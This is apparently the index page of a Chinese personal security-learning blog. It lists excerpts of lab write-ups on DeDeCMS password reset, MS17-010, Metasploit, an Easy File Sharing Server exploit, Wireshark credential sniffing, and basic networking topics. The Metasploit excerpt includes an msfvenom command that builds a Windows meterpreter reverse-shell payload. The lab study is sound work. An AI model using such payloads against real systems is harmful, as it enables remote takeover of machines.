自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

m0_56368726的博客

  • 博客(9)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 DeDeCMS 前台任意用户密码修改

1、复现环境PHP 5.6DeDeCMSV5.7SP2 正式版(2018-01-09)使用PHPstudy来搭建网站下载DeDeCMSV5.7SP2后放在该目录下开启会员模式设置注册账号(不要设置安全问题)2、漏洞复现

2021-12-15 08:38:05 538

原创 ms17-010漏洞复现

一、漏洞原理1、简介永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB协议是一个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输。Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码。

2021-12-15 08:35:48 2094

原创 Metasploit应用

1、生成被控端使用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.128 lport=5000 -f exe -o /root/mydir/payload.exe这里我们使用msfvenom来生成一个被控端程序,用于windows平台下的被控端程序:windows/meterpreter/reverse_tc,lhost的值为kali的ip,该程序的保存位置为:/root/payload.exe...

2021-11-07 23:32:20 186

原创 easy file sharing server 的漏洞利用

1、首先在winxp靶机上安装efssetup_2018.zip,并运行2、扫描靶机进行的服务使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。可以看到靶机的80端口提供的服务为easy file sharing server。3、查找漏洞渗透模块我们可以用“searchsploit"命令在kali中查找所需要的渗透模块。我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。...

2021-11-07 19:02:39 399

原创 Metasploitable2中FTP漏洞

1、查看靶机的ipMetasploitable2默认的用户名是 :msfadmin 密码是: msfadmin登陆之后使用ip addr查看ip地址靶机的ip为192.168.43.253

2021-11-04 21:27:36 316

原创 wireshark 抓取明文账号与密码

1、获取目标网站的ipwin+R打开cmd,使用ping命令,来获取目标网站的ip2、启动wireshark,过滤掉无关信息过滤器填写http and ip.addr==目标网站的ip3、登录账号密码4、查看账号密码这样就可以看到目标网站的中的账号密码了。目标网站对账号密码不进行加密,很容易导致用户的隐私信息泄露。...

2021-10-31 17:22:10 1443

原创 Linux系统常用操作命令(以kali Linux为例)

创建文件和目录使用touch命令可创建一个文件名为“myfile”的文件,如图使用“mkdir 目录名”命令在当前目录下创建名为“mydir”的子目录,如图使用”ls“命令查看文件和目录是否存在。文件的复制和移动和删除使用”cp 源文件 目标文件“命令可进行文件复制,如图使用“mv 源文件 目标文件”命令可进行文件的移动使用“rm 文件名”可以删除文件,用“rm -r 目录”可删除目录注意:...

2021-10-31 16:53:48 794

原创 ping的详解

ping首先看看百度的解释:ping (Packet Internet Groper)是一种因特网包探索器,用于测试网络连接量的程序。Ping是工作在TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo请求报文,测试目的站是否可达及了解其有关状态。简单来说,ping可以向一个网络地址发送探测包,看该网络地址是否有响应并统计响应时间,以此测试网络。。...

2021-10-17 22:32:26 2944

原创 等保2.0

等保1.0在1.0的初期,企业只要有安全意识,能开始做等保,开始测评就已经很不错了;到了中期,整体防护,渗透测试,合规开始等于安全。行业等级保护全面开展,等保开始逐渐的深入人心;再到1.0的后期,无论是企业层面还是国家层面,都更注重实质性的安全。主动防御、态势感知、攻防对抗等安全手段开始流行,云安、大数据、工控安全和移动安全开始占领主要趋势。等保2.0等保2.0全称网络安全等级保护2.0制度,是我国网络安全领域的基本国策、基本制度。等级保护标准在1.0时代标准的基础上,注重主动防御,从被动防御..

2021-10-11 13:12:56 3370

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除